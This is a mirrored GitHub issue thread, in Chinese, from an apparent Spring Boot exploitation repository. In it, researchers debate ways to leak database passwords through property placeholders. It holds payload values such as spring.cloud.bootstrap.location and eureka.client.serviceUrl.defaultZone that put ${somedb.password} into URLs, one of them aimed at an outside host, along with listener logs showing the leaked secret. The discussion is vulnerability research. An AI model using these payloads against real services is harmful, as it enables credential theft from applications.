Giter Club home page Giter Club logo

Comments (3)

LandGrey avatar LandGrey commented on May 26, 2024

纠正一下:

  • 出处不是你给的文章里的内容,利用 spring.cloud.bootstrap.location=http://${somedb.password}@artsploit.com/yaml-payload.yml 偷密码跟本不能复现,有理由怀疑根本不行,而作者没有测试或者跟踪源码

  • 你可以跟一下 eureka.client.serviceUrl.defaultZone 偷密码那个流程,结合了 eureka 的认证流程,所以可以外带密码

from springbootvulexploit.

UUUUnotfound avatar UUUUnotfound commented on May 26, 2024

ok, 多谢师傅指正,

spring.cloud.bootstrap.location=http://${somedb.password}@artsploit.com/yaml-payload.yml

这里确实不能在认证头里面带出来密码, 这里会被springboot忽视掉, 但是可以用下面这种

spring.cloud.bootstrap.location=http://127.0.0.1:8888/${somedb.password}.yml

Listening on [0.0.0.0] (family 0, port 8888)
Connection from localhost 1188 received!
HEAD /123456.yml HTTP/1.1
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Java/1.8.0_201
Host: 127.0.0.1:8888
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive

这个
eureka.client.serviceUrl.defaultZone=http://${somedb.password}@127.0.0.1:5000

利用手法也是去年3月份挖Eureka的时候偶然发现的,

总的**还是从让Spring对占位符进行填充星号字段来实现数据外带,

选择认证头的原因是也是偶然, 当时看到eureka进行访问的url_path/apps/,

以为不可以在url_path传, 也想过http请求出不来的情况, 甚至是dnslog传.

刚才试了一下, 确实也可以在url_path里传递
eureka.client.serviceUrl.defaultZone=http://${somedb.password}@127.0.0.1:5000/123123

Listening on [0.0.0.0] (family 0, port 5000)
Connection from localhost 1319 received!
GET /123123/apps/ HTTP/1.1
Accept: application/json
DiscoveryIdentity-Name: DefaultClient
DiscoveryIdentity-Version: 1.4
DiscoveryIdentity-Id: 192.168.175.1
Accept-Encoding: gzip
Host: 127.0.0.1:5000
Connection: Keep-Alive
User-Agent: Java-EurekaClient/v1.6.2
Authorization: Basic MTIzNDU2Om51bGw=

spring.cloud.bootstrap.location 是我今年写文章的时候看到这的点可以rce, 看到也是HTTP请求,拓展了一下, 没来及测试, 确实不够严谨, 我会在文章里改掉这一点。

from springbootvulexploit.

LandGrey avatar LandGrey commented on May 26, 2024

学习了,确实可以从目标发外部 http 请求的过程中,在 url path 中利用占位符带出数据

from springbootvulexploit.

Related Issues (8)

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.